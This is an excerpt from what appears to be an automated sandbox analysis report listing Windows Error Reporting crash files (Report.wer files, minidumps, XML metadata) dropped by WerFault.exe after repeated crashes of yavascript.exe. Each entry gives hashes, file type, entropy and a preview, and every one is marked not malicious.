MD5:	AFF92396F75267866DB12FB9895C48A5
SHA1:	0989100FC8A448F84346CC7AFB51DBF15007C0CA
SHA-256:	491354A4B2A68807D40BAE2D5940BF6C625AAC4375089F24EEF85FDC1E79FC96
SHA-512:	765EE4205B478897AB7E452FB9823EFB28CA34D0B3EDAECE69F78CDF77F863B8BBF8196DA7653D443A9F991AA0DA22B9BB9489D89596A08C9639F619BD1C551C
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.7.0.7.3.1.5.9.9.8.3.3.6.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.e.3.1.9.0.e.6.-.2.3.3.a.-.4.8.6.9.-.8.3.8.2.-.d.6.2.6.f.6.e.8.d.b.5.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.3.6.7.0.e.3.b.-.7.2.7.6.-.4.9.1.9.-.a.5.7.2.-.2.b.4.5.d.9.4.7.e.e.4.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.2.c.-.0.0.0.1.-.0.0.1.4.-.a.e.2.6.-.9.1.7.1.d.2.e.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.5.c.1.e.b.a.f.9.5.8.1.3.4.e.6.7.4.a.7.a.7.b.d.1.6.3.6.2.9.2.4.0.0.0.0.f.f.f.f.!.0.0.0.0.c.4.a.6.e.f.7.2.6.3.0.2.6.d.7.4.c.7.a.b.5.4.6.3.7.c.d.4.b.3.3.6.0.2.8.1.4.3.b.3.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.6././.2.9.:.0.8.:.1.7.:.2.5.!.0.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yavascript.exe_a985261773a5dc88975a913f0d965a0c7e0144_4acc4190_5c417b38-d7ba-4cb1-ae14-b8bdcbba9f16\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9190000655698709
Encrypted:	false
SSDEEP:	192:4rnabP0JsAnbcAfjsAZr3uzuiFJZ24IO8N:Gnab8JsAnbcAfjKzuiFJY4IO8N
MD5:	330151F2314A5D54AC1F74AE9E60FBF8
SHA1:	EC59FEBAC675DC8EC093FEC6B3962854D1DC935B
SHA-256:	BA3BD2079034465259F34380BD225B7C07E4D4F1BF1C47941C83ED4129EC5F93
SHA-512:	D837E39F6BAC9EB22C42BB84212B2E2B566FBED7BA87A6F7E75C3638271FF27F38C22B79499D60F439B8FE72FF777B2E2095B18CB1F681A356158A105C8983EE
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.7.0.7.3.1.6.2.2.1.8.5.8.7.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.c.4.1.7.b.3.8.-.d.7.b.a.-.4.c.b.1.-.a.e.1.4.-.b.8.b.d.c.b.b.a.9.f.1.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.b.d.d.b.6.e.-.0.8.4.8.-.4.e.1.d.-.a.1.c.1.-.3.b.1.6.1.9.e.9.e.6.f.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.2.c.-.0.0.0.1.-.0.0.1.4.-.a.e.2.6.-.9.1.7.1.d.2.e.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.5.c.1.e.b.a.f.9.5.8.1.3.4.e.6.7.4.a.7.a.7.b.d.1.6.3.6.2.9.2.4.0.0.0.0.f.f.f.f.!.0.0.0.0.c.4.a.6.e.f.7.2.6.3.0.2.6.d.7.4.c.7.a.b.5.4.6.3.7.c.d.4.b.3.3.6.0.2.8.1.4.3.b.3.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.6././.2.9.:.0.8.:.1.7.:.2.5.!.0.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yavascript.exe_a985261773a5dc88975a913f0d965a0c7e0144_4acc4190_7fbd1449-e5a4-4edb-bd32-3a1e8888cead\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9186793131364961
Encrypted:	false
SSDEEP:	192:wRbP0JsAnbcAfjsAZr3uzuiFJZ24IO8No:wRb8JsAnbcAfjKzuiFJY4IO8No
MD5:	54E66305768047AE830C1BCBE21852EB
SHA1:	7676A17F9C916D972D8FC6189D8E29F89DE099BA
SHA-256:	CB21F61460A427A308EEBAD5EC3FBAF79C5F021C6831C66E0D51E2F6FADFC4DA
SHA-512:	850898BD993BE7EFA5AA6F76A2093CC6398AB62A78D3C599518F037C2EE1730DFB929E00A8824BA7E7AB61954CCA778BF49179432E4B48D1E2F9D01409440732
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.7.0.7.3.1.6.4.9.4.9.1.5.2.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.f.b.d.1.4.4.9.-.e.5.a.4.-.4.e.d.b.-.b.d.3.2.-.3.a.1.e.8.8.8.8.c.e.a.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.e.3.f.0.c.4.2.-.3.3.b.1.-.4.b.7.a.-.9.f.2.b.-.d.a.2.f.e.8.0.6.6.c.c.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.2.c.-.0.0.0.1.-.0.0.1.4.-.a.e.2.6.-.9.1.7.1.d.2.e.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.5.c.1.e.b.a.f.9.5.8.1.3.4.e.6.7.4.a.7.a.7.b.d.1.6.3.6.2.9.2.4.0.0.0.0.f.f.f.f.!.0.0.0.0.c.4.a.6.e.f.7.2.6.3.0.2.6.d.7.4.c.7.a.b.5.4.6.3.7.c.d.4.b.3.3.6.0.2.8.1.4.3.b.3.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.6././.2.9.:.0.8.:.1.7.:.2.5.!.0.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yavascript.exe_a985261773a5dc88975a913f0d965a0c7e0144_4acc4190_b02c9b3b-c645-4939-abe3-32e35ffb6f96\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.918984409751296
Encrypted:	false
SSDEEP:	192:29f7ubP0JsAnbcAfjsAZr3uzuiFJZ24IO8N:2F7ub8JsAnbcAfjKzuiFJY4IO8N
MD5:	E4B41F4E431B55EE27E50D7E1EB92F34
SHA1:	CC778BBFE1B8E589370083396D3B90424AFD6D9A
SHA-256:	ED598229D113E5CAE3064348E60FE0E8721374C2AF45D9A99AD6262439E0FC37
SHA-512:	0D4FB5CB545A9776066D2E2E853F1F0F983DCC35EFDAE4E9D1B97446A7473283859EE82A41D12053837F2DB3675EB39CCDA8919587365EB5C33B35A78E8A2C3E
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.7.0.7.3.1.6.7.7.0.0.8.3.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.2.c.9.b.3.b.-.c.6.4.5.-.4.9.3.9.-.a.b.e.3.-.3.2.e.3.5.f.f.b.6.f.9.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.8.f.4.d.a.9.-.e.b.5.9.-.4.e.5.b.-.a.e.7.a.-.3.a.2.5.5.c.9.2.3.3.6.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.2.c.-.0.0.0.1.-.0.0.1.4.-.a.e.2.6.-.9.1.7.1.d.2.e.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.5.c.1.e.b.a.f.9.5.8.1.3.4.e.6.7.4.a.7.a.7.b.d.1.6.3.6.2.9.2.4.0.0.0.0.f.f.f.f.!.0.0.0.0.c.4.a.6.e.f.7.2.6.3.0.2.6.d.7.4.c.7.a.b.5.4.6.3.7.c.d.4.b.3.3.6.0.2.8.1.4.3.b.3.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.6././.2.9.:.0.8.:.1.7.:.2.5.!.0.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER53FD.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 2 11:52:21 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	56278
Entropy (8bit):	2.231745487969295
Encrypted:	false
SSDEEP:	384:4BltdrPSUfC3IyizRfHvv+E3KoQ0So3Af+fxX7:4BltdrqUfC4yilv+eKU3AfSX
MD5:	0E86E64580798A1B62C6C483F57CDB29
SHA1:	2E76D010EB32E4FEF8AB488B4E957B8C912FEE28
SHA-256:	71A15BE965BA859391B2FC2E510E4E5B270E38B05F62038C4ABC1568089219A4
SHA-512:	44BEE67BF888355DC9A32D44AC4DDB1F2BE247CA90C01AB8E2518886DD82B975771191CCE8B16A09960E2965B94BE666C365FBCD9AA626A2DD47CD13C2BA6D88
Malicious:	false
Preview:	MDMP..a..... .......u.f........................D...........D....1..........T.......8...........T........... '..........................................................................................................eJ..............GenuineIntel............T.......@...l.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5611.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8350
Entropy (8bit):	3.706430151872411
Encrypted:	false
SSDEEP:	192:R6l7wVeJ1l6U6YEIGSU9UFgmftnpBQ89br8sf6Zm:R6lXJX6U6YEJSU9UFgmft1rPft
MD5:	72A216900FBCAB10287E7E797D8D00EE
SHA1:	A016F673E4D7E0FE92085064E616F195A9B85098
SHA-256:	485865C9F438C4C5D5E97714C71BD86CA63C53B38DD44EBFEF7C939255581C65
SHA-512:	F433FC3A52D33FA259E81D31CDD0DF89CDBD2531F068169BCF4FBF717AE3F362FF0E1C6B71AC76964BCFBD2036A8279DA0361196A688C875191D31428B0D8AEF
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5641.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.50058134633926
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9M3WpW8VYdYm8M4JBmCFuXo+q8YQUVVEkd:uIjfNI7aG7VxJB24jxVVEkd
MD5:	3B8529CEF1811F8B486BFAB695BEF79E
SHA1:	138A0B6E6ED3AEF07834EFBFFEFC3044CC650F98
SHA-256:	3120C070DE00C108EE5F5892D6070C2C3CC3AA9334F7E1D29019C7CFCE783BCA
SHA-512:	99073719102A4BB7CCA44205E4A0014EF4D26E2B66C92144B810CC5C11D7D4AE4A38A043C23A9DAD567C92A86C57E813C5616C4C17D4533C47F2EFC29A8A15B4
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="437935" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5813.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 2 11:52:22 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	84150
Entropy (8bit):	2.302377256254568
Encrypted:	false
SSDEEP:	384:wZi0ehYUflbNeAL8yo3Hapu83cBo4iqVp+E3Kok0dKuTbXgwv2L:wZi0ehYUflDBo4VsBDFD+eK7uTbXfu
MD5:	54BB9821DD18AD077E7405230BA6811F
SHA1:	B4E81FC0FDBDBE44618735B6917857D63219F8D6
SHA-256:	7C87BB1DE9B150C77265166F97BD1BB450E8395A5437CC6D6E2754BA2DC4B551
SHA-512:	26CDB1CAAACF16E72547747B91D1C672A3B9E3E95D4FE7B6CA03F297522CF892DEC825216033C17BA82D2A2D71B92488222220568915B9324E6FB05530500CA8
Malicious:	false
Preview:	MDMP..a..... .......v.f............T...............\.......D....<..........T.......8...........T...........p,..F...........x...........d...............................................................................eJ..............GenuineIntel............T.......@...l.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER590E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8352
Entropy (8bit):	3.704600348671662
Encrypted:	false
SSDEEP:	192:R6l7wVeJ1jj6OC6YEINSU90mgmftnpB089br8sfYZm:R6lXJJj6L6YECSU90mgmftprPfL
MD5:	F1130F67B331ED6E7B4C9DF9F8B74E16
SHA1:	3EE675C47CC774D78CA8E168B101269407769242
SHA-256:	41C3C09F1452F10FDC2098A48FF9C34FFB3A5E92965F30A07BE980331A3CCDDB
SHA-512:	4D5830BE432FA368B55BA26D2E027BE1CDF684DC080D17869659F935F3B6D06FFD731B035EC04347C51B9E987874C9710A688DB7D1CDE41F78597DB87FF2FC68
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER592F.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.502680656260085
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9M3WpW8VYaYm8M4JBmCFk+q8YQUVVEkd:uIjfNI7aG7VeJB8jxVVEkd
MD5:	1CA3E15C5608257B689898B24E2D13A6
SHA1:	5DCC5AD4B927704BF453B48C19F3BE281DEFF779
SHA-256:	3B9946B5E8E2E2B47629D3D483A46E65F0930DDCF16397E907A8CF3CD0585CE2
SHA-512:	6FB1E9F3D986EF1EA72B1D4FACE771BB93975808D28CDAF8A76DDB38E77F0FF1F44F3D3CE7DA3604DE3777DC94DD5DBB49A2154A31FF77B9333307F25D5E0A5A
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="437935" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5AE2.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 2 11:52:23 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	82434
Entropy (8bit):	2.2767638968792197
Encrypted:	false
SSDEEP:	384:jq0eV3UfYAo3HRPLP3cBo4iqVp+E3Ko00lS0QaMqua:jq0eV3UffoBrsBDFD+eKZ0Qa0
MD5:	CA8081206108F7BEDD349B7509E68155
SHA1:	487A49E1E019E05A03A95D953F7C3346EA92D060
SHA-256:	DF84F984C95D2C4A5E49557171DEB745E114747F27D48C4815BFBAAB1611C48E
SHA-512:	39797970BFCA1B754E891E7805EC6707E70DA2B79CAAAE3B4BF695E81D097C4005B70D99F30268F65FA678E51272371477FF61109ABA75D375DB8B3617E30B4D
Malicious:	false
Preview:	MDMP..a..... .......w.f............T...............\.......$....<..........T.......8...........T........... ,..............x...........d...............................................................................eJ..............GenuineIntel............T.......@...l.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B9F.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8352
Entropy (8bit):	3.7057350732239707
Encrypted:	false
SSDEEP:	192:R6l7wVeJ1ju6v6YEIzSU90mgmftnpBa89bi8sfzWm:R6lXJJu6v6YE8SU90mgmftbiPfL
MD5:	4A74FCB2A5A56F5BCB51F6CF9C67DD56
SHA1:	F6FE9830A9271A309B85A9EEC134369951A2F51C
SHA-256:	9958AF94F7EDD36B00E0C22F7654F7A9AAA88D370D59C24D508B43408D2DAEB3
SHA-512:	C016E72BCF44FBBD322C93F2F96F490E61A7F6B87CEBA8AD0574EBD112039F93375F03C65351CCAC8106BC5A55B8CB34867507F128DD666BADE6C336838F958F
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5BBF.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.50125168046884
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9M3WpW8VYbPYm8M4JBmCFUo+q8YQUVVEkd:uIjfNI7aG7ViSJBfjxVVEkd
MD5:	DEF5E16BD4EE68EFEFAB7F26345301A5
SHA1:	CF3355753CC1F1A771F6E9B6A5C16DCD0F862A80
SHA-256:	C272249D77A7D5D80D00299FBCD0AD2DDBD7105826759B27AB20152246BF7662
SHA-512:	42FCECB32D6797452A8E10C535A7A1879924384E99ACABE7F89E16CC7B73E7E173743FD97E7CCB68CEC40983E97419E7A8D32DFF406111867CB305FD14A02294
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="437935" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D72.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 2 11:52:24 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	82306
Entropy (8bit):	2.2958596887413014
Encrypted:	false
SSDEEP:	384:j0ex3xLUfT3HKTQh9P3cBo4iqVp+E3KoS0FHvrV0hpP:j0ex3xLUfTa87sBDFD+eKivrcZ
MD5:	822CAC6A69CA0FEDDCBC5DF93F1E6BD4
SHA1:	8F61D3AC080458D9C111043725A899961FA4066D
SHA-256:	CC1D5ADD499D4566FE4E58DC2651C3B85193F9FD9753361365F21574D95D5432
SHA-512:	79A9EF44BA713F233005FD2761304561C572969F19D315FB44A7F645FBA990402E03752E2ECD2C5EEF45F735FDBF68195416F7E8608B9AEC17CBD3A311D2D56F
Malicious:	false
